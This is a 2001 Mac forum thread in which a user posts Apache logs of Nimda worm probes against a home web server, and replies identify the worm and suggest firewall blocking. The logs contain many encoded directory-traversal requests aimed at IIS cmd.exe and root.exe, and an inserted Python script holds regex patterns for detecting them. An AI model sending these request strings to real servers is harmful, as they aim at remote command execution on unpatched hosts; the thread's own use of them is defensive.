How secure is OS X's Web Sharing and File Sharing?

PowerBookDude

Registered
I was just wondering how secure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something. What does this mean? (NOTE: I removed the IP address.)

- - [12/Oct/2001:12:12:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:12:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:12:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:12:17 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
- - [12/Oct/2001:12:12:41 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:12:41 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:12:43 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:12:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:41:09 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:41:09 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:10 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:41:11 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:12 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:31 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:14:34:34 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:14:34:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:38 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:39 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:40 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:14:34:41 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

Also, any tips for people running Web and File Sharing to make sure everything is secure?
 

marmoset

Official Volunteer
Originally posted by PowerBookDude
I was just wondering how secure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something. What does this mean? (NOTE: I removed the IP address.)


{ nimda spew deleted - d.w. }

Also, any tips for people running Web and File Sharing to make sure everything is secure?
First, all the activity you are seeing is 0wned Microsoft IIS machines trying, fruitlessly, to infect you with the NIMDA worm. Being that you are running the Apache webserver platform on UNIX, you are immune to it. Those boxes were trying to infect you before you enabled Web Sharing too -- you just didn't have a piece of software listening on that port willing to log all of the attempts until now.

Apache is a solid, battle-tested web server. It's a very popular open source project, which means there are lots of sets of eyes looking at the code and correcting vulnerabilities before they can be widely exploited. In contrast, IIS is a closed project and arguably it was originally written with a pretty lax eye towards security. Only now that it has become a corporate embarrassment has the developer focused upon securing it.

To keep up on security issues wrt OS X Web Sharing, I would suggest keeping an eye on http://www.apache.org and http://www.securityfocus.com
 

LordOphidian

Adjutant On-Line
Yep, that's Nimda. My personal rule for running a server is, Walk softly and carry the BAN stick. Basically, if they start hitting you like this you can try to contact them if you can, or you can just block their requests to port 80 on your machine through your firewall.

Someone gets out of line? Ban them.

Check out BrickHouse (versiontracker.com) for a good app to set up your firewall with.
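As an added example (not code from any poster in this thread), here is a small Python script that parses Apache access-log lines like the ones quoted above and counts the Nimda-style probe requests per client address, so the decision to block a source rests on a count rather than on eyeballing the log. The sample log lines, the RFC 5737 test addresses in them, and the threshold of three probes are all assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in Apache common log format (not the poster's lines;
# the client IP field uses RFC 5737 documentation addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2001:12:12:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
198.51.100.7 - - [12/Oct/2001:12:12:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
198.51.100.7 - - [12/Oct/2001:12:12:41 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
203.0.113.9 - - [12/Oct/2001:12:20:00 -0400] "GET /index.html HTTP/1.0" 200 1043
203.0.113.9 - - [12/Oct/2001:12:20:01 -0400] "GET /images/logo.gif HTTP/1.0" 200 5120
198.51.100.7 - - [12/Oct/2001:12:12:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
"""

# Common log format: ip ident user [timestamp] "method path protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Request-path features that mark the IIS/Nimda probes seen in the thread:
# root.exe / cmd.exe requests and the encoded "..\" traversal variants.
PROBE_PATTERNS = [
    re.compile(r"/root\.exe", re.I),
    re.compile(r"/cmd\.exe", re.I),
    re.compile(r"\.\.%(25)?5c|\.\.%c[01]%[0-9a-f]{2}|\.\.%%35", re.I),
]

def parse_line(line):
    """Split one access-log line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}

def is_probe(path):
    """True when the request path matches one of the worm probe signatures."""
    return any(p.search(path) for p in PROBE_PATTERNS)

def probe_counts(log_text):
    """Return {ip: number of Nimda-style probe requests} for a block of log text."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec["path"]):
            counts[rec["ip"]] += 1
    return counts

def ban_candidates(log_text, threshold=3):
    """Addresses that sent at least `threshold` probes (threshold is an assumption)."""
    return sorted(ip for ip, n in probe_counts(log_text).items() if n >= threshold)

if __name__ == "__main__":
    for ip, n in probe_counts(SAMPLE_LOG).most_common():
        print(f"{ip}: {n} probe requests")
    print("ban candidates:", ban_candidates(SAMPLE_LOG))
```

Feed it your real access_log instead of SAMPLE_LOG and pass the resulting addresses to whatever firewall tool you use (the thread mentions BrickHouse) rather than banning by hand.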
 

Soapvox

Want some of my Kool-aid?
Or better yet, if I have to do it by hand where are the httpd logs normally placed?
 